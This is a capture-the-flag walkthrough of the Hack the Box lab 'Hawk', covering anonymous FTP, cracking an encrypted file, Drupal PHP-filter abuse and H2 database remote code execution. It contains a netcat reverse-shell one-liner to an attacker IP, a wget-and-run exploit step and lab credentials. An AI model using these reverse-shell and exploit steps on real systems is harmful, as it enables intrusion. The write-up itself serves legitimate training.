Today we are going to solve another CTF challenge
“HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box for
helping pentester’s to perform online penetration testing according to your
experience level; they have a collection of vulnerable labs as challenges, from
beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are online available therefore
they have static IP. The IP of HawkNew is 10.10.10.102
Penetration
Methodology:
§ Port
scanning and IP discovery
§ Anonymous
FTP Login
§ Checking
file type
§ Getting
Login Credentials
§ Browsing
IP through port 80
§ Exploiting
Drupal
§ Reading
First Flag User.txt
§ Getting
Login Credentials
§ Spawning
TTY Shell
§ Searching
exploit via Searchsploit
§ Getting
root Access
§ Reading
Final Flag Root.txt
Walkthrough
Let’s start off with our basic nmap command to find out
the open ports and running services.
nmap -A 10.10.10.102
The Nmap output shows various open ports: 21(ftp),
22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).
From the NMAP Scan output we saw that ftp Port 21 is Open and the next thing
that catches our eyes is it so it has Anonymous
login allowed.
ftp 10.10.10.102
We easily connected to ftp through Anonymous Login.
Moving on, after navigating through multiple directories we found a hidden file
i.e. “.drupal.txt.enc “and then we transferred the file to our local machine.
Since .drupa.txt.enc
is encrypted. Let’s check the file type using ‘file’ command.
file.drupal.txt.enc
It came out to be openssl
encoded data with salted password. Clearly we need to decrypt the file to
get any further clue.
To crack this file, we have used an openssl bruteforce
tool which is easily available on github. You can download it from the given
below link or can run the following command for downloading and script
execution.
git
clonehttps://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute
--file /root/.drupal.txt.enc
Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123” this could be the password for CMS
Login. Let’s Check it.
As port 80 is running http server, we open the target
machine’s IP address in our browser and found out it’s a Drupal Login Page. To Login this page we have used a Basic
Username: admin and Password: PencilKeyboardScanner123.
Oh yeah!! We
have successfully logged into admin dashboard. Now go to modules and then enable the check box for Path and PHP filter.
After that go to Content
> Add Content > Basic Page to create a basic page where we can write
malicious code to spawn the web shell. Just give any title for your malicious
code.
Here we have written one-liner code for PHP reverse shell
with the help of Pentest Monkey website.
&1|nc
10.10.14.10 1234 >/tmp/f"); ?>
Then select the Text
format as “PHPCode”. Before saving it you should start netcat listener on the listening port. So, once the code is
executed it will establish a reverse connection.
nc -lvp 1234
We got a reverse connection of victim’s machine on our
netcat listener. To spawn the proper shell we have used python3 bin bash one
liner.
python3 -c ‘import
pty;pty.spawn(“/bin”bash”)’
Inside /home/denial we have got to User.txt
flag, now time to find the root flag. While exploring through directories, we
thought of reading the contents of the “settings.php”
file, in this file we found the password: drupal4hawk
cat settings.php | grep Password
Then with the following command we switch the user and
logging in as user daniel.
su daniel
Password:
drupal4hawk
Here we have used Simple phyton3 commands to escape the
python3 interpreter.
>>import pty
>>pty.spawn(‘/bin/bash’)
From Nmap scan output we notice that “H2 database running on port 8082”,
therefore we search out for H2 database exploit in searchsploit.
searchsploit H2
database
It came out to be a Remote Code Execution. The exploit we
have used is highlighted, after that we have copied the exploit 45506.py in
the /root directory
and run a Python server to download the file in the target machine.
searchsploit -m
45506
python -m
SimpleHTTPServer 8080
Afterwards we have downloaded our exploit 45506.py in
the /tmp directory of target machine. Then Grant the FULL
permission to the exploit and execute it using command.
cd /tmp
wget
http://10.10.14.10:8080/45506.py
chmod 777
455506.py
python3 45506.py
–H 127.0.0.1:8082
id
Finally!! We have got the root access.
Now let’s go and get the “root.txt”.
We take a look at the content of the file and find our final flag.
Author: Ashray Gupta is a Security Researcher and
Technical Writer at Hacking Articles. Contributing his 2 years in the field of
security as a Penetration Tester and Forensic Computer
Analyst. Contact Here
0 comments:
Post a Comment